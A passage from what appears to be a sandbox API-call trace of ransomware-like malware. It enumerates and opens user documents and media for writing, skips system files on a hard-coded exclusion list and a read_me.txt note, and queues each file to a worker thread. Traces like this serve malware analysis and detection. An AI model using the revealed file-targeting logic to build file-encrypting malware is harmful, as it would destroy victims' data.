pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\R-vKwcM20r5mYO.flv") returned 108 [0075.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\R-vKwcM20r5mYO.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\ofbsljmg5f yphpxq3lw\\r-vkwcm20r5myo.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x824 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="read_me.txt") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="autoexec.bat") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="desktop.ini") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="autorun.inf") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="ntuser.dat") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="iconcache.db") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="bootsect.bak") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="boot.ini") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="ntuser.dat.log") returned 0x0 [0075.994] StrStrW (lpFirst="r-vkwcm20r5myo.flv", lpSrch="thumbs.db") returned 0x0 [0075.994] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 42 [0075.994] QueueUserWorkItem (Function=0x404e00, Context=0x824, Flags=0x0) returned 1 [0075.994] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.994] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\read_me.txt") returned 101 [0075.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4aqclz9qavwtjc5qkbv\\j9-mn6\\ofbsljmg5f yphpxq3lw\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x828 [0075.995] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.995] CloseHandle (hObject=0x828) returned 1 [0075.995] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0075.995] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0075.995] wnsprintfW (in: pszDest=0x8b600b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4aQclz9QavwtjC5QkBV\\j9-MN6\\OFbSLjMg5F ypHpxq3Lw\\read_me.txt") returned 101 [0075.995] GetProcessHeap () returned 0x4f10000 [0075.995] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600b8 | out: hHeap=0x4f10000) returned 1 [0075.995] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 42 [0075.995] GetProcessHeap () returned 0x4f10000 [0075.995] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b800c8 | out: hHeap=0x4f10000) returned 1 [0075.995] GetProcessHeap () returned 0x4f10000 [0075.995] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b800c8 [0075.995] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\*") returned 58 [0075.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc13f9be0, ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0075.995] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\.") returned 58 [0075.995] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc13f9be0, ftCreationTime.dwHighDateTime=0x1d4cf7d, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.995] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\..") returned 59 [0075.995] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe528ea60, ftCreationTime.dwHighDateTime=0x1d4c60f, ftLastAccessTime.dwLowDateTime=0xe25c7a90, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0xe25c7a90, ftLastWriteTime.dwHighDateTime=0x1d4c628, nFileSizeHigh=0x0, nFileSizeLow=0xa016, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="9Yj0SX-7Wg6MAp811z.ppt", cAlternateFileName="9YJ0SX~1.PPT")) returned 1 [0075.995] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\9Yj0SX-7Wg6MAp811z.ppt") returned 79 [0075.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\9Yj0SX-7Wg6MAp811z.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\9yj0sx-7wg6map811z.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x828 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="read_me.txt") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="autoexec.bat") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="desktop.ini") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="autorun.inf") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="ntuser.dat") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="iconcache.db") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="bootsect.bak") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="boot.ini") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="ntuser.dat.log") returned 0x0 [0075.996] StrStrW (lpFirst="9yj0sx-7wg6map811z.ppt", lpSrch="thumbs.db") returned 0x0 [0075.996] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 43 [0075.996] QueueUserWorkItem (Function=0x404e00, Context=0x828, Flags=0x0) returned 1 [0075.996] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa686faf0, ftCreationTime.dwHighDateTime=0x1d4cf0f, ftLastAccessTime.dwLowDateTime=0x5348acd0, ftLastAccessTime.dwHighDateTime=0x1d4cd70, ftLastWriteTime.dwLowDateTime=0x5348acd0, ftLastWriteTime.dwHighDateTime=0x1d4cd70, nFileSizeHigh=0x0, nFileSizeLow=0x2856, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="K-xcXNu.mp3", cAlternateFileName="")) returned 1 [0075.996] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\K-xcXNu.mp3") returned 68 [0075.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\K-xcXNu.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\k-xcxnu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x82c [0075.996] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="read_me.txt") returned 0x0 [0075.996] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="autoexec.bat") returned 0x0 [0075.996] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="desktop.ini") returned 0x0 [0075.997] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="autorun.inf") returned 0x0 [0075.997] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="ntuser.dat") returned 0x0 [0075.997] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="iconcache.db") returned 0x0 [0075.997] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="bootsect.bak") returned 0x0 [0075.997] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="boot.ini") returned 0x0 [0075.997] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0075.997] StrStrW (lpFirst="k-xcxnu.mp3", lpSrch="thumbs.db") returned 0x0 [0075.997] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 44 [0075.997] QueueUserWorkItem (Function=0x404e00, Context=0x82c, Flags=0x0) returned 1 [0075.997] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70378d10, ftCreationTime.dwHighDateTime=0x1d4c95c, ftLastAccessTime.dwLowDateTime=0xcc156620, ftLastAccessTime.dwHighDateTime=0x1d4d253, ftLastWriteTime.dwLowDateTime=0xcc156620, ftLastWriteTime.dwHighDateTime=0x1d4d253, nFileSizeHigh=0x0, nFileSizeLow=0x1450b, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="oOrJCH_u4fw7H.docx", cAlternateFileName="OORJCH~1.DOC")) returned 1 [0075.997] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\oOrJCH_u4fw7H.docx") returned 75 [0075.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\oOrJCH_u4fw7H.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\oorjch_u4fw7h.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x830 [0075.997] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="read_me.txt") returned 0x0 [0075.997] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="autoexec.bat") returned 0x0 [0075.997] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="desktop.ini") returned 0x0 [0075.997] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="autorun.inf") returned 0x0 [0075.997] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="ntuser.dat") returned 0x0 [0075.997] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="iconcache.db") returned 0x0 [0075.997] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="bootsect.bak") returned 0x0 [0075.998] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="boot.ini") returned 0x0 [0075.998] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="ntuser.dat.log") returned 0x0 [0075.998] StrStrW (lpFirst="oorjch_u4fw7h.docx", lpSrch="thumbs.db") returned 0x0 [0075.998] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 45 [0075.998] QueueUserWorkItem (Function=0x404e00, Context=0x830, Flags=0x0) returned 1 [0075.998] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x627bbc10, ftCreationTime.dwHighDateTime=0x1d4cde8, ftLastAccessTime.dwLowDateTime=0xdcd766e0, ftLastAccessTime.dwHighDateTime=0x1d4c914, ftLastWriteTime.dwLowDateTime=0xdcd766e0, ftLastWriteTime.dwHighDateTime=0x1d4c914, nFileSizeHigh=0x0, nFileSizeLow=0xae29, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="PEWZ_zvD.doc", cAlternateFileName="")) returned 1 [0075.998] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\PEWZ_zvD.doc") returned 69 [0075.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\PEWZ_zvD.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\pewz_zvd.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x834 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="read_me.txt") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="autoexec.bat") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="desktop.ini") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="autorun.inf") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="ntuser.dat") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="iconcache.db") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="bootsect.bak") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="boot.ini") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="ntuser.dat.log") returned 0x0 [0075.998] StrStrW (lpFirst="pewz_zvd.doc", lpSrch="thumbs.db") returned 0x0 [0075.998] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 46 [0075.999] QueueUserWorkItem (Function=0x404e00, Context=0x834, Flags=0x0) returned 1 [0075.999] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246a5360, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x246a5360, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246a5360, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0075.999] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\read_me.txt") returned 68 [0075.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x838 [0075.999] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0075.999] CloseHandle (hObject=0x838) returned 1 [0075.999] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e387740, ftCreationTime.dwHighDateTime=0x1d4cb2e, ftLastAccessTime.dwLowDateTime=0x545ca0c0, ftLastAccessTime.dwHighDateTime=0x1d4caf2, ftLastWriteTime.dwLowDateTime=0x545ca0c0, ftLastWriteTime.dwHighDateTime=0x1d4caf2, nFileSizeHigh=0x0, nFileSizeLow=0x11bdc, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="VhdNesE9RHAIm.pps", cAlternateFileName="VHDNES~1.PPS")) returned 1 [0075.999] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\VhdNesE9RHAIm.pps") returned 74 [0075.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\VhdNesE9RHAIm.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\vhdnese9rhaim.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x838 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="read_me.txt") returned 0x0 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="autoexec.bat") returned 0x0 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="desktop.ini") returned 0x0 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="autorun.inf") returned 0x0 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="ntuser.dat") returned 0x0 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="iconcache.db") returned 0x0 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="bootsect.bak") returned 0x0 [0075.999] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="boot.ini") returned 0x0 [0076.000] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="ntuser.dat.log") returned 0x0 [0076.000] StrStrW (lpFirst="vhdnese9rhaim.pps", lpSrch="thumbs.db") returned 0x0 [0076.000] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 47 [0076.000] QueueUserWorkItem (Function=0x404e00, Context=0x838, Flags=0x0) returned 1 [0076.000] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c4bcc0, ftCreationTime.dwHighDateTime=0x1d4cee6, ftLastAccessTime.dwLowDateTime=0x38160200, ftLastAccessTime.dwHighDateTime=0x1d4c8b1, ftLastWriteTime.dwLowDateTime=0x38160200, ftLastWriteTime.dwHighDateTime=0x1d4c8b1, nFileSizeHigh=0x0, nFileSizeLow=0x8324, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="ZOgYMomyZE0.png", cAlternateFileName="ZOGYMO~1.PNG")) returned 1 [0076.000] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\ZOgYMomyZE0.png") returned 72 [0076.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\ZOgYMomyZE0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ree1zsicxxt 9a\\zogymomyze0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x83c [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="read_me.txt") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="autoexec.bat") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="desktop.ini") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="autorun.inf") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="ntuser.dat") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="iconcache.db") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="bootsect.bak") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="boot.ini") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="ntuser.dat.log") returned 0x0 [0076.000] StrStrW (lpFirst="zogymomyze0.png", lpSrch="thumbs.db") returned 0x0 [0076.000] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 48 [0076.000] QueueUserWorkItem (Function=0x404e00, Context=0x83c, Flags=0x0) returned 1 [0076.000] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6c4bcc0, ftCreationTime.dwHighDateTime=0x1d4cee6, ftLastAccessTime.dwLowDateTime=0x38160200, ftLastAccessTime.dwHighDateTime=0x1d4c8b1, ftLastWriteTime.dwLowDateTime=0x38160200, ftLastWriteTime.dwHighDateTime=0x1d4c8b1, nFileSizeHigh=0x0, nFileSizeLow=0x8324, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="zogymomyze0.png", cAlternateFileName="ZOGYMO~1.PNG")) returned 0 [0076.000] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.001] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReE1ZSiCxXt 9A\\read_me.txt") returned 68 [0076.001] GetProcessHeap () returned 0x4f10000 [0076.001] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b800c8 | out: hHeap=0x4f10000) returned 1 [0076.001] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 43 [0076.001] GetProcessHeap () returned 0x4f10000 [0076.001] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b500b0 | out: hHeap=0x4f10000) returned 1 [0076.001] GetProcessHeap () returned 0x4f10000 [0076.001] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b800c8 [0076.001] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 45 [0076.001] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.001] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.") returned 45 [0076.001] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2499eee0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2499eee0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.001] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\..") returned 46 [0076.001] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b306110, ftCreationTime.dwHighDateTime=0x1d58463, ftLastAccessTime.dwLowDateTime=0x4f705aa0, ftLastAccessTime.dwHighDateTime=0x1d53b0b, ftLastWriteTime.dwLowDateTime=0x4f705aa0, ftLastWriteTime.dwHighDateTime=0x1d53b0b, nFileSizeHigh=0x0, nFileSizeLow=0xb7b4, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="0tm45Vd-10FUKtTqfmOc.docx", cAlternateFileName="0TM45V~1.DOC")) returned 1 [0076.001] wnsprintfW (in: pszDest=0x8b800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0tm45Vd-10FUKtTqfmOc.docx") returned 69 [0076.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 